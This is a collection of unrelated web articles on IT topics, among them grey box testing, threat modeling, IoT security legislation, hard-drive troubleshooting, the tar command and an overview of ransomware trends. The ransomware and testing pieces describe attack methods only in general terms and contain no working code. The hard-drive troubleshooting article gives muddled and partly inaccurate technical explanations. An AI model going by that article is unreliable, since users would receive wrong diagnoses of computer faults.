as ecommerce websites or knowledge bases for call centers. Before content is organized for external consumption, many internal processes require the ability to find and reuse high-value content that typically hasn’t been curated effectively. If we can reduce the amount of churn, friction, and asset duplication and make it easier for others in the enterprise to leverage the collective knowledge and expertise of coworkers, the enterprise can become more agile and efficient. The resulting improvement applies to structured as well as unstructured information. Big data initiatives compound the problem by adding more sources to the mix. As more organizations deploy complex customer-facing applications, trying to stitch together internal systems and processes and interpret more streams of data, foundational capabilities and competencies in data, information, and knowledge cura-tion become more important. With the explosion of information and the coming Internet of Things, this problem will only become more pressing and the need more urgent. The recipe for getting ahead of the curve and leveraging technology to improve the customer experience is to begin with clear goals that support business objectives at a detailed process level—not at an abstract, theoretical level. It’s also important to get the basic housekeeping in order—consistent language and terminology, unstructured content organization, data curation at the source, and data governance processes for making decisions and allocating resources. Big data and new customer experience technologies are game changers to be sure. However, unless the lessons of the productivity paradox are applied, these changes will only serve as distractions. These lesson include - aligning IT investments with the business strategy; - creating a more agile structure by decentralizing functions; - decentralizing the IT organization but retaining strong centralized standards and coordination; - refining, streamlining, and improving processes when deploying new IT systems; - performing a competitive analysis to benchmark organizational maturity; and - establishing measurement and feedback loops to course correct and deploy resources appropriately.(4) Companies that anticipate the changing needs of the rapidly changing market-place and successfully implement new technology put themselves in a good position to gain the edge over their competitors. 1. A.B. Markman and K.L. Wood, Tools for Innovation: The Science Be-hind the Practical Methods That Drive New Ideas, Oxford University Press, 2009, pp. 157–159. 2. E. Brynjolfsson, “The Productivity Paradox of Information Technology: Review and Assessment Center for Coordination Science,” MIT Sloan School of Management, 1994; http://ccs.mit.edu/papers/ CCSWP130/ccswp130.html. 3. S. Earley, C. Hogue, and M. Walch, “Taxonomies, Metadata, and Publishing,” Earley & Associates, 5 Dec. 2007; https://www.earley.com/ training-webinars/taxonomies-metadata-and-publishing. 4. J. Dedrick and K.L. Kraemer, The Productivity Paradox: Is it Resolved? Is there a New One? What Does It All Mean for Managers?” Center for Research on Information Technology and Organizations, UC Irvine, 2001; http://escholarship. org/uc/item/4gs825bg. This Article was originally published in IT Pro.
<urn:uuid:ab3125fd-3109-4056-bedf-09e0f84b16ef>
CC-MAIN-2022-40
https://www.earley.com/insights/knowledge/articles/digital-transformation-staying-competitive
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00052.warc.gz
en
0.925096
2,381
2.671875
3
Kinect started off for Xbox 360, but its morphed since then to adapt to the newer Xbox One as well as Microsoft's operating system. There seems to be no end to the uses the device can be utilised for. However, the medical field is one of the most specialised industries around and adoption of new technology can be hard to find, with the rigorous requirements involved. Now the doctors at the University of California at San Diego have managed to find a way to incorporate Kinect for Windows into their job. "The project, called Lab-in-a-Box, is the brainchild of UCSD researcher Nadir Weibel and his colleagues at the San Diego Veterans Affairs (VA) Medical Center", the Kinect team explains. The device is essentially being used almost as a baby-sitter, monitoring the doctor's visit with a patient. What it's looking for is the human contact, making sure that each physician is paying attention to the patient as opposed to spending too much time at the computer screen. "The Kinect sensor plays a key role in the process, as its depth camera accurately records the movements of the physician’s head and body. An independent eye-tracker device detects the doctor’s gaze, while a microphone picks up the doctor-patient conversation". All of this is captured and used to analyse against the doctor's computer usage and a detailed report is formed that allows everyone to know what is really transpiring in that room. It was created to help deal with today's increasingly digital world and ensure that the relationship between doctor and patient doesn't suffer. The setup is still being tested and is only used with permission from both doctor and patient. It's an interesting concept and perhaps part of the future, though no doubt some people will have privacy concerns - after all we aren't all comfortable getting undressed as a camera watches on.
<urn:uuid:7e8fc752-c5e0-4181-a8f0-4f2aa1415c29>
CC-MAIN-2022-40
https://www.itproportal.com/2015/03/07/kinect-gets-new-healthcare-role-monitoring-doctor-patient-interactions/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00252.warc.gz
en
0.975611
382
3
3
University of Washington researchers have developed a way to use backscatter techniques to send IoT sensor data over distances using almost zero power. Researchers at the University of Washington have developed IoT devices that run on almost zero power and can transmit data across distances of up to 2.8 kilometres. The breakthrough could enable large arrays of interconnected devices, the say. The scientists presented their findings at Ubicomp 2017 last week and demonstrated how sensors could be equipped with a built-in modulation technique called a long-range backscatter system, which uses reflected radio signals to transmit data at extremely low power and low cost. A range of deployments In tests, the team achieved coverage throughout a 4,800-square-foot house, an office area covering 41 rooms and a one-acre vegetable farm. This new technique is called chirp spread spectrum. It spread reflected signals across multiple frequencies to enable sensitivities and decode backscattered signals across greater distances, even in ‘noisy’ conditions. “Until now, devices that can communicate over long distances have consumed a lot of power. The trade-off in a low-power device that consumes microwatts of power is that its communication range is short,” explained Shyam Gollakota, lead faculty and associate professor in the Paul G. Allen School of Computer Science & Engineering at University of Washington. “Now we’ve shown that we can offer both, which will be pretty game-changing for a lot of different industries and applications.” Cost and coverage The sensors use 1,000 times less power than existing technologies capable of transmitting data over similar distances, which could pave the way for putting connectivity into many objects. They are also very cheap, costing up to 20 cents each. This could allow a farmer to cover an entire field to establish how to economically plant seeds or water. The sensors could also be used to monitor pollution or traffic in smart cities. “People have been talking about embedding connectivity into everyday objects such as laundry detergent, paper towels and coffee cups for years, but the problem is the cost and power consumption to achieve this,” said Vamsi Talla, CTO of Jeeva Wireless, a spin-off company founded by the UW team of computer scientists and electrical engineers to commercialize the research. The research team expects to begin selling the technology within the next six months.
<urn:uuid:70694c34-272b-480b-82c1-e3400292d8dc>
CC-MAIN-2022-40
https://internetofbusiness.com/researchers-backscatter-breakthrough-iot/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00252.warc.gz
en
0.939569
493
3.25
3
What is Grey Box Testing? It focuses on all layers of any complex software system to increase testing coverage. It enables testing of the presentation layer and the internal coding structure. It is mostly used in integration and penetration testing. In this Blog, we are going through the Gray Box Testing Table of contents: - Grey Box Testing - Why the Grey Box Testing? - The objective of Gray Box Testing - Process of Gray Box Testing - What is Gray Box Penetration Testing - Tools of Grey Box Testing - Techniques of Gray Box Testing - Difference between Black Box and Gray Box - Advantages and Disadvantages of Gray Box Testing - Examples of Gray Box Testing If you’re interested in CyberSecurity, Here’s a video for you Grey Box Testing: Gray box testing is a software testing technique in which testers do not have the complete product knowledge and only have limited information about internal functionality and code. They have access to detailed design documents as well as information about the requirement. This testing method is a hybrid of black box and white box testing. The tester has no knowledge of the code during black box testing. They know what the output will be for the given input. The tester has complete knowledge of the code during white box testing. Gray box testing is most helpful in evaluating web applications, performing integration testing, testing distributed environments, testing business domains, and performing security assessments. When conducting this testing, make clear distinctions between testers and developers to ensure that test results are not influenced by internal knowledge. Wanna Get Certified from IIT Guhawati in Cybersecuirty, Here’s an Opportunity for you Intellipaat Cyber Security course Why the Grey Box Testing? Gray Box Testing is carried out for the following reasons: - It combines the advantages of both black box and white box testing - It combines developer and tester input and improves overall product quality - It reduces the overhead associated with the lengthy process of testing functional and non-functional types - It provides enough time for a developer to fix bugs - Testing is conducted from the perspective of the user rather than the designer The Objective of Gray Box Testing The objective of Gray box testing is to improve product quality by combining functional and non-functional testing, which saves time and the lengthy process of testing the application. Another objective is to have the application tested from the perspective of the user rather than the designer, and to give the developers enough time to fix the bugs. Wanna do Master’s in Cybersecurity, Here’s an Opportunity for you Intellipaat Cyber Security Master’s Program Process of Gray Box Testing: The tester is not required to design test cases in Gray box testing. Test cases are instead generated using algorithms that evaluate internal states, program behavior, and application architecture knowledge. The tester then runs the tests and interprets the results. When performing grey box testing, you should do the following: - Determine and choose inputs from white and black box testing methods. - Determine the most likely outcomes from these inputs. - Determine critical paths for the testing phase. - Determine sub-functions for in-depth testing. - Determine the inputs for sub-functions. - Determine the likely outputs of sub-functions. - Carry out sub-function test cases. - Results must be evaluated and verified. - Steps 4–8 should be repeated. - Steps 7 and 8 must be repeated. Grey box testing test cases may include GUI related, security related, database related, browser related, operational system related, and so on. Excited about learning more about Cyber Security? Enroll in our Cyber Security course in India and get yourself certified. What is Grey Box Penetration Testing? As ethical (white hat) hackers, they replicate an attacker by performing reconnaissance, identifying vulnerabilities, and breaking into your systems using similar techniques. In contrast to an attacker, we stop our test before exposing sensitive data or causing harm to your environment. A Gray Box Penetration Test provides us with “user” knowledge of and access to a system. When testing an insider threat or an application that supports multiple users, a Gray Box Penetration Test is typically used. The insider threat is evaluated to determine the potential damage that a user (non-administrator) could cause to your environment. Application testing is used to ensure that a user on an application cannot access another user’s data or escalate privileges. A Gray Box Penetration Test is commonly used in the two scenarios listed below: - Application Testing: In the Application Testing scenario, we typically test an application as an authenticated user, such as a web application or custom-built application - Insider Threats: We are frequently given user-level access to an Enterprise Windows Domain for the Insider Threat scenario. This validated, user-level access is used to validate and test user rights, permissions, and access. Users should only be given the information they need to do their job. Many organizations do not fully comprehend or document all of the access that a “user” may have. Wanna Crack Cyber Security Interviews, here’s an opportunity for you Top 50 Cyber Security Interview Questions and Answers! Tools of Grey Box Testing: The automated testing tools are intended for use in testing applications for specific purposes. For example, selenium is used to test web applications only on browsers, whereas appium is used to automate mobile application testing. So the various automation testing tools are as follows: Techniques of Gray Box Testing: Gray box testing techniques are intended to enable penetration testing of your applications. These techniques allow you to test for both insider threats (employees attempting to manipulate applications) and external users (attackers attempting to exploit vulnerabilities). Gray box testing ensures that applications function as expected for authenticated users. You can also ensure that malicious users do not have access to data or functionality that you do not want them to have. There are several techniques available when performing grey box testing. Depending on the testing phase and the application’s functionality, you may want to combine multiple techniques to ensure that all potential issues are identified. Here are some techniques of Gray-Box Testing: - Matrix Testing: Matrix testing is a technique for analyzing all variables in a program. The developers define technical and business risks in this technique, and a list of all application variables is provided. Each variable is then evaluated based on the risks it poses. This technique can be used to identify unused or unexploited variables. - Regression Testing: whether application changes or bug fixes have resulted in errors in existing components. It can be used to ensure that changes to your application only improve the product rather than relocate faults. Because inputs, outputs, and dependencies may have changed, you must recreate your tests when performing regression testing. - Pattern Testing: Pattern testing is a technique for identifying patterns that lead to defects by evaluating previous defects. These evaluations should ideally highlight which details contributed to defects, how the defects were discovered, and how effective the fixes were. This information can then be used to identify and prevent similar defects in new versions of an application or new applications with similar structures. Learn more about Cyber Security Tutorial! Difference between Black Box and Gray Box |Black Box||Grey Box| |It is a software testing technique in which the tester is unaware of the application’s internal structure.||It is a software testing technique in which the tester only has a partial understanding of the internal structure of the application under test.| |It is referred to as closed box testing.||It is referred to as Translucent testing| |There is no requirement of knowledge for implementation||Knowledge of implementation is required, but it is not necessary to be an expert.| |It is based on the software’s external expectations and behavior.||It is built on a database and data flow diagrams.| |It enhances some of the software’s features.||It enhances the overall quality of the software.| Aspire to become certified Cyber Security professionals, here’s a chance for you Cyber Security course in Chennai! Courses you may like Advantages and Disadvantages of Gray Box Testing When deciding whether or not to use grey box testing, consider the following advantages and disadvantages. These can assist you in determining whether grey box testing is appropriate for your testing situation and how much value it can provide: - Testing considers the user’s perspective, thereby improving product quality overall - Clear testing objectives are established, making it easier for testers and developers to work together - Testing methods give developers more time to fix bugs - It has the potential to eliminate conflicts between developers and testers - Testers are not required to be programmers - It is less expensive than integration testing Disadvantages of Grey-Box Testing: - In distributed systems, it can be difficult to link defects to root causes - Due to restricted access to the internal application structure, code path traversals are limited - It cannot be used to test algorithms - Designing test cases can be challenging Examples of Grey Box Testing - Grey box testers can analyze error codes and investigate the cause in depth if they have knowledge of and access to the error code table, which includes the cause for each error code. Assume the webpage receives an error code of “Internal server error 500,” and the cause of this error is shown in the table as a server error. Using this information, a tester can further investigate the problem and provide details to the developer rather than merely describing it to them. - When testing a website, if the tester clicks on a link and receives an error message, the Grey box tester can make changes to the HTML code to verify the error. In this scenario, white box testing is performed by changing the code, and black box testing is performed concurrently as the tester tests the changes at the front end. Grey box testing is produced by combining the White box and the Black box. Gray box testing is very useful because it combines both black-box and white-box testing techniques. This testing method is more suitable for web-based applications, functional testing, and domain testing. The creation of test cases for grey box testing includes all aspects such as security, database, browser, GUI, and so on. This testing technique is more sensitive to complex scenarios than others. It is built on functional specifications rather than source code or binaries. If you have any doubts or queries regarding the Cyber Security, shoot it right away in our Cyber Security Community!
<urn:uuid:c19ad094-c801-4093-a87e-2d039cbc4fa1>
CC-MAIN-2022-40
https://www.businessprocessincubator.com/content/what-is-grey-box-testing/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00252.warc.gz
en
0.889437
2,229
2.59375
3
What is threat modeling? Threat modeling is an activity most of us incorporate in our daily life. For instance, a commuter might wonder what his action would be if his train is delayed, which leads to him missing his flight. Threat modeling is a process that helps us identify potential threats. Obviously, it also allows us to analyze the imposed risks and introduce mitigation strategies. At its core threat modeling answers four key questions: - Where am I most vulnerable to attack? - What are the most relevant threats? - What should I do to safeguard against these threats? Threat modeling prioritizes a journey of understanding security over a fixed snapshot (such as pen testing). Why threat modeling? 100% security doesn’t exist. Security is difficult if not impossible to objectively quantify as opposed to e.g., code coverage in testing. Hence, it is challenging to answer the question how much investment in security is enough or necessary. Threat modeling provides a list of the most essential concerns. It can also provide an approximated cost for fixing them. How does it work? Threat modeling is a team exercise, including architects, engineers, security champions and testers. We organize an initial threat modeling workshop for all the stakeholders at your organization. After the initial training we will organize a number of time-boxed workshops. Together we will create a model of your system. Based on this model we will start eliciting threats, assess their risk level and look into possible mitigation strategies. What do you get? The result of the threat modeling is a helicopter view of the security state-of-the-practice in the context of your software system. Threat modeling provides amongst others a list of threats, their likelihood, impact, risk, and mitigation strategy. As opposed to pen testing that provides a largely loose snapshot of your security posture, threat modeling is a first step in helping your organization introduce a culture of finding and fixing threats in a more autonomous manner. Threat modeling is also focused on uncovering design-level errors as opposed to a list of security bugs presented by the pen-testers.
<urn:uuid:f986ffa9-4841-45ac-ae55-294cbcd35122>
CC-MAIN-2022-40
https://codific.com/architectural-risk-assessment/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00252.warc.gz
en
0.95503
428
2.5625
3
Email and passwords: the most common knowledge gaps in cybersecurity are revealed Statistics from students of a corporate security awareness platform show that people most frequently make mistakes answering questions related to email and password usage. Tasks around these topics are in the top 5 most commonly failed by users. The compliance of staff members remains one of the biggest concerns when it comes to cybersecurity: a recent survey of IT workers shows that inappropriate usage of IT resources by employees is the most common incident they face in their work. At the same time, 90% of employees tend to overestimate their knowledge of cybersecurity basics. To identify the most vulnerable areas in corporate cybersecurity awareness, Kaspersky analyzed the answers given by people while going through the online security awareness quiz. According to the internal Kaspersky Automated Security Awareness Platform data, the most difficult question - with 83% of wrong answers - is asking what card details shouldn’t be emailed. The remaining four of the five most frequent wrongly answered questions consist of tasks regarding email interaction and password usage: - Check all signs showing that someone has accessed your account. (73% answered incorrectly); - You buy an app from the Google Play store and the system suddenly asks you to enter your Gmail email password. What should you do? (70% answered incorrectly); - Fraudsters have hacked your friend's email. He will not restore access to the mailbox, claiming that he has not used it for many years and does not store any important information there. Explain why access still needs to be restored. (70% answered incorrectly); - You are on a business trip, and your Internet access is unstable. While you are in another city, a colleague urgently needs a document that can only be accessed from your work account. This colleague asks you for a password from your computer. What should you do? (51% answered incorrectly). Users show more vigilance when it comes to confidential corporate data. 99% of people correctly answered the questions devoted to sensitive information leakage or if a person with access to confidential documents leaves the company. “It is understandable that people tend to be more careful with confidential information. This kind of data, by definition, implies that an employee must be more attentive while working with it. At the same time, sending information via email and entering passwords are part of our everyday routine and, at first sight, don’t pose any special risks. However, this negligence can be costly for a company, as criminals still employ old methods of cybercrime, such as the brute force of phishing. That is why it is important that corporate cybersecurity training uncovers all possible weaknesses and vulnerabilities even in most common everyday scenarios.” - comments Denis Barinov, Head of Kaspersky Academy. To help companies refresh their employees’ cybersecurity knowledge around the essential parts of their work and personal interactions, Kaspersky has introduced a free online course on social media. As cybercriminals relish the opportunity to use social networks to obtain the information they need to carry out attacks against ordinary users and their employers, the course will teach staff how to avoid becoming a victim of social media scams. To benefit from training on safeguarding your online life, learn which information you should avoid sharing via the Internet, and how to avoid social engineering, please visit our website. Statistics are based on the results of 12 500 Kaspersky Security Awareness Platform users, trained between January – April 2022.
<urn:uuid:6c270c7e-14d0-4334-a3ab-e0348d98d4dd>
CC-MAIN-2022-40
https://www.kaspersky.com/about/press-releases/2022_email-and-passwords-the-most-common-knowledge-gaps-in-cybersecurity-are-revealed
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00252.warc.gz
en
0.947548
701
2.546875
3
New legislation could be on the way to secure the devices we use in our everyday lives. From our smart phones to our garage door openers, the IoT space has revolutionized the way we organize and live out our daily routine. In recent months, the security of these devices has been scrutinized as vulnerabilities have been uncovered, and even worse, exploited. Republicans Cory Gardner and Steve Daines along with Democrats Mark Warner and Ron Wyden are working to introduce a new bill that will work to prevent such attacks – Internet of Things Cybersecurity Improvement Act of 2017. The bill outlines “minimal cybersecurity operational standards for Internet-connected devices purchased by Federal agencies, and for other purposes.” The legislation is intended to hold providers of devices that connect to the internet accountable for potential threats to the security of the connected products. These companies would need to provide patches, fixes, and other means to safeguard against attacks as they are uncovered. The bill lays out several security focuses, including: - IoT companies that offer products purchased by the federal government must ensure their devices are patchable, rely on industry standard protocols, do not use hard-coded passwords, and do not contain any known security vulnerabilities - Requirements for alternative network-level security requirements for devices with limited data processing and software functionality, led by the Office of Management and Budget (OMB) - The development of new guidelines regarding cybersecurity coordinated vulnerability disclosure policies to be required by contractors providing connected devices to the U.S. Government, led by the Department of Homeland Security’s National Protection and Programs Directorate - An executive agency mandate to inventory all Internet-connected devices in use by the agency This concept may be new to those within the growing IoT space, but it is already the status quo in many Federal agencies and heavily Regulated Industries around the globe. Security standards and procedures exist today in order to hold companies accountable for the technology they produce, and through an accredited security certification testing process, they are validated against potential threats to systems and infrastructure. This new movement to secure the IoT space has already taken lessons learned from other industries in order to quickly and effectively introduce protocols to protect user data and security. This new bill specifically “requires the contractor providing the Internet-connected device to provide written certification that the devices, does not contain, at the time of submitting the proposal, any hardware, software, or firmware component with any known security vulnerabilities or defects listed in the National Vulnerability Database of NIST.” NIST oversees other security certifications such as FIPS 140-2, which is used to secure products sold into the U.S. federal government are required to complete FIPS 140-2 validation if they use cryptography in security systems that process sensitive but unclassified information. If you would like more information regarding IoT Security, or how existing security certifications like: FIPS 140-2, Common Criteria, or the DoD’s APL, can be applied- then contact Corsec today to get started! Subscribe to Corsec emails!
<urn:uuid:9e220217-8a3b-47c0-8034-7619c17e954c>
CC-MAIN-2022-40
https://www.corsec.com/iot-regulation/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00252.warc.gz
en
0.937191
617
2.59375
3
Hard drives are the key area of a computer system, based on which the entire system runs. So if the hard disk is in a good condition, then the system is also in a good and healthy condition. But, health of anything is a flexi system, which may show troubles at any point of time. What to do during such troubles. There can be many troubles in a computer device. But all troubles are not due to hardware. So, one is needed to understand which problem is caused due to a problem at hardware. Here is a short and effective narration of the common symptoms that indicates a damaged or trouble making hardware of any computer system. Here are some common symptoms of the hard drive and the RAID arrays failures; Any reading or writing needs a storage device. When human does read or write then they also need a super access of their brain, which is the storage device of human. But only brain doesn't serve the purpose. It needs intellect with it to complete the process of reading and writing. Thus for computer system also, the key thing to read or write is the storage device and the intellect there is the hard disk. Thus when one continuously sees an error for reading and writing in computers then, he or she must realize that the system is getting troubles from its hard disk. He or she may try again to look after the matter by a full restart of the device. Many a times problems are resolved there only, if not then manufacturer or mechanic may be given a call. Sometimes the system display and a mouse move or even a move of the cursor after the key from the keyboard is pressed reacts after a minute or such. This is an indication that the hard disk is busy in doing something else. This happens with any one at his or her house. He or she may be going to do something, when the television in front is showing something which is very much attracting and lucrative. His or her entire concentration goes to that television show or event, but the remembrance of the work he or she was doing made them do the work, but due to bifurcation of mind the work progress becomes too slow to be completed at time. The computer hardware also functions in the same way. Whenever it gets busy in doing some important mechanism within, it's external command following becomes extraordinarily slower. So during this time it is better to allow the hard disk to complete its earlier work, and retry the operation a little while later. Many a times the computer system behaves just like the human. One have listened to word, which has been told to him, but the person is so busy in doing something else, that he or she doesn't even want to lose his or her concentration by giving a mere response to the word. When, due to no response the words are repeatedly been told quite few times, then the person shouts to answer that he have listened to the words and will response a little while later. The computer system also does the thing in the same pattern as human usually does. The computer gives a late reply to the command with a loud voice. Here also this is an indication of the busyness of the hard disk and so it is better to give the hard disk some time to complete its earlier work and then follow the commands provided instantly. Many a times the computer shows a message that there is a problem in booting. Now that is a serious case and can be checked at the bios setting of the computer. If these storage devices are mounted rightly, then the problem is in the hard drive. It's basically a temporary inaccessibility of data and thus the hard disk cannot get proper data from storage devices and other strings and spring setups. If the SATA or PATA are checked by reordering as prima and secondary memory, then also if the system doesn't respond rightly, then either a mechanic or the manufacturing team has to be given a call to make the system viewable by their expert eyes. Sometimes it happens that the computer system shows a command that drive is not found or recognized. The immediate action at this command will be the option to check the disk, do necessary defragmentation but if the system continues to show the message, then this is an indication that the drive is to be replaced as the drive is losing contact with the hard disk and so it needs to be replaced. So, one must start making backup of files in other system or in other devices as the replacement of drive will result a huge data loss obviously. One may insert a pen drive or any external device to the system, and when his or her work is completed then just make the system shut down and leave the set. Next time when he or she starts the system, then he or she may find an error showing no Operating System has been found. He or she may be astonished to see that, and may definitely think that his or her all data are lost. But there is nothing to become frightened about the thing as the command is shown because the external device is plugged in and thus the hard disk is thinking that that the system will be formatted with a new OS and when it finds no OS in the external device then, it starts showing this type of commands. So, just making the USB drive out of the system, will solve the problem at ease. A number of server devices now a day use the redundant arrays or RAID arrays of independent disks. If one faces problems with controller, and then starts up the computer, he or she might see troublesome error command that says, RAID not found. So one may go for checking the configuration of RAID on the computer and feel ensured that the controller is working properly. If it's faulty or anything in it is missing, one may find a message inside of the computer at the start up as, this controller is not configured. It won't work properly. If one views a message that Problem is with the array, then he or she may go for launching the RAID console to check the status of the drives. It is different for different RAID manufacturers. So one must check the documentation to see which process will work. And one must be able to correlate back the drives with any physical drive inside the computer. He would try to replace the wrong drive within the array Sometimes the system goes off by showing a blue sign or a blue screen. This is a signal that the drives are not synchronizing with the hard disk that is why the hard disk is not responding to the command of the drive. This turning the screen blue and auto shut down or auto restart by the machine is known as BSOD. If this process happens once by accident and never repeats in the near future, then this is just a blockage of the hardware. But if the trouble is repeated many a times and is happening once in every login time, then there is a serious hard disk problem and needs a mechanic or the manufacturer support for returning the things in order. But before going for that, one must make it sure that every important thing has been backed up. Now as the troubles of the hard disk are identified, so it is the times for a short description of the tools that are required to trouble shoot the devices or the hard disk problem. The first thing one may need is the screwdriver for opening the device hard disk or to reach the drives physically. So he or she may require a screwdriver for the operation. For the recovery purpose one may need some external USBs or devices to store the recovery files easily and efficiently for the purpose of its reuse or reinstallation. Since, USBs can be used to install files; software's, flashes, videos, and even can be used to reboot a computer, so this devices is a very effective mean to store the files for recovery purpose. One may check the status of all the disks by putting a command at the command or run box as CHKDSK. But they can also find them at the start up or at the control panel or at the administrative tool. This will show one what is the condition of the drives and disks, and will also provide a user to defrag the device for clearing the residuals n the hard disk and make the hard disk run faster and smoother. If this thing also doesn't help one to recover from the problem, then for trouble shooting he or she may need to contact the manufacturer for warranty replacement or for maintenance. The next important tool for troubleshooting a hard disk error is formatting. Formatting computer has three steps. The first step is to insert the OS drive in the computer through external devices or through CDs or DVDs. Then one may go the drive where the OS is there and go to the repair area for a disk check and repairing of the thing that is in wrong condition, or restore a string which has been missing. If the problem is not resolved there then is the complete formatting episode. In case of complete formatting one will need to reallocate the disk space and all the data and files will be erased from the computer. So if the complete format is the only choice that is left, then one have to take proper backups of the data and then can go for the full format. The format usually solves all the problems, until the hard disk or the mother board has been damaged. If the trouble remains even after the format, then one may understand that the hard disk is required to be changed or replaced. The final too for hard disk trouble shooting is using the file recovery software. There is much such software in the market that recovers file that has been moved out of the recycle bin; there is even software for recovering the files that has been lost or not saved. Using that software some missing strings can be reinstalled to get the trouble wash off. There may be numerous problems in the device handling. There may be more problems in understanding the system. So a basic idea about the system software, support and hard ware helps one in many aspects. It is like knowing the first aid treatment. It's used to make the patient move out of the danger instantly, until the doctors come for the check up. Like that, the preliminary knowledge makes the user ready to handle the basic things in computer. The diagnosis problem in the computer is a big problem, as other than diagnosis nothing can be done out there. So to get out of the risks, one must know where from the troubles are sourced into the system, which is a mere problem or a temporary one and which one is a permanent one; which can be fixed by him or which can be fixed only by professionals; which problem is having its source at the monitor, which is having source at the configuration, and which one is due to a hardware crashing. Once this basic knowledge is adopted, the other segment of the basic knowledge is the sector for knowing tools. This tool includes software, and also settings within the system. Understanding this helps to do the first aid treatment for a computer injury instantly. SPECIAL OFFER: GET 10% OFF Pass your Exam with ExamCollection's PREMIUM files! SPECIAL OFFER: GET 10% OFF Use Discount Code: A confirmation link was sent to your e-mail. Please check your mailbox for a message from [email protected] and follow the directions. Download Free Demo of VCE Exam Simulator Experience Avanset VCE Exam Simulator for yourself. Simply submit your e-mail address below to get started with our interactive software demo of your free trial.
<urn:uuid:7a498b96-0a8e-4df2-8818-8fab28f4071d>
CC-MAIN-2022-40
https://www.examcollection.com/certification-training/a-plus-how-to-troubleshoot-hard-drives-and-raid-arrays-and-troubleshooting-tools.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00252.warc.gz
en
0.961327
2,325
2.625
3
How to compress and extract files using tar command in Linux The tar command in Linux is often used to create .tar.gz or .tgz archive files. This command has a large number of options, but you just need to remember a few letters to quickly create archives with tar. The tar command can extract the resulting archives, too. Compress an Entire Directory or a Single File Use the following command to compress an entire directory or a single file on Linux. It will also compress every other directory inside a directory you specify – in other words, it works recursively. tar -czvf name-of-archive.tar.gz /path/to/directory-or-file Here’s what those switches actually mean: - -c: Create an archive. - -z: Compress the archive with gzip. - -v: Display progress in the terminal while creating the archive, also known as “verbose” mode. The v is always optional in these commands, but it’s helpful. - -f: Allows you to specify the filename of the archive. If you have a directory named ‘data’ in the current directory and you want to save it to a file named archive.tar.gz , you would run the following command: tar -czvf archive.tar.gz data If you have a directory at /usr/local/something on the current system and you want to compress it to a file named archive.tar.gz , you would run the following command: tar -czvf archive.tar.gz /usr/local/something Extract an Archive Once you have an archive, you can extract it with the tar command. The following command will extract the contents of archive.tar.gz to the current directory. tar -xzvf archive.tar.gz It’s the same as the archive creation command we used above, except the -x switch replaces the -c switch. This specifies you want to extract an archive instead of create one. You may want to extract the contents of the archive to a specific directory. You can do so by appending the -C switch to the end of the command. For example, the following command will extract the contents of the archive.tar.gz file to the /tmp directory. tar -xzvf archive.tar.gz -C /tmp
<urn:uuid:116553ba-9b84-4318-860e-a72da901ac6c>
CC-MAIN-2022-40
https://support.hostway.com/hc/en-us/articles/360000263544-How-to-compress-and-extract-files-using-tar-command-in-Linux
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00252.warc.gz
en
0.826658
508
3.03125
3
Ransomware is a type of malicious software that disrupts computers, servers, and other devices. After installing itself, ransomware software blocks access, deletes, or otherwise compromises legitimate data and applications. Human-operated ransomware refers to attacks in which a human threat actor employs active hacking techniques, along with the deployment of malware, to advance a ransomware attack. Most ransomware demands a payment, or ransom, to “unlock” the computer and grant full access to the device and any related data and applications. There are several different types of ransomware, including: Block access to data and applications by encrypting files and devices. Completely block access to a computer system. Claims to identify other malware like viruses on your computer, and then demands money to remove them. Steals sensitive information from your computer and threatens to release it online. Also known as “hands-on-keyboard,” are when cybercriminals actively navigate through targeted infrastructure. An increasingly common ransomware business model. This refers to the practice of an attacker paying a ransomware service operator a subscription fee to use ready-packaged ransomware toolkits/malware. In RaaS, the ransom payout is shared between the ransomware owners and their affiliates. The affiliates are the entities who execute the ransomware payload and the owners are the purveyors of the RaaS malware. Ransomware operators will typically scan for unsecured, open ports to start their attack. Internet-exposed Remote Desktop Protocol (RDP) endpoints continue to be cited in threat reports as the number one entry point for ransomware. Remote access technology like VPNs has given attackers a back door to gain broad access to an organization's network and deliver ransomware payloads. Phishing emails with infected attachments or malicious links also continue to surge in volume. In 2020 and into 2021, ransomware threats have seen a massive resurgence. In 2020, ransomware surged 150%. Moreover, 35% of breaches across all industries were ransomware-related in 2020. In 2021, ransomware has been a constant presence in the news and had a tangible impact on everyday consumers. New instances of widespread disruption, such as the Colonial Pipeline attack by the DarkSide hacker group, gripped headlines for weeks. The attack took 45% of the U.S. East Coast's fuel supply offline. This quickly induced panic buying, fuel shortages, and increased the price at the pump. Hospitals and other medical providers, cryptocurrency exchanges and miners, and smaller, niche businesses continue to be lucrative targets for ransomware attacks. The way criminals use ransomware is also changing. The ransomware-as-a-service model is increasing in popularity. As BeyondTrust Labs reported in their Malware Threat Report 2021, the latest generation of RaaS is better at staying hidden within a network it has breached. Often the operator will leverage common pen testing tools – such as Cobalt Strike or PowerShell Empire – to perform network reconnaissance and spread. The ransomware then leverages privilege escalation techniques to gain control of critical systems and disable security controls, before finally encrypting key systems and exfiltrating data. Nation-state actors launching ransomware attacks as part of international cyber warfare in another unsettling trend. DarkSide is a hacker group leveraging the RaaS model. The group has deployed ransomware attacks across financial, legal, manufacturing, and other sensitive industries. Famously, the DarkSide ransomware group was responsible for the Colonial Pipeline Company incident in May 2021. The cybercriminal group found stolen credentials that provided access to a dormant Colonial Pipeline VPN account. Unfortunately, this VPN account was still connected to the network. It’s likely the credentials found by DarkSide were re-used across multiple systems. After the payload was executed, critical pipeline systems and infrastructure were forced to go offline. This resulted in the shutdown of nearly 45% of the fuel supply of the East Coast of the United States. In a slightly unusual 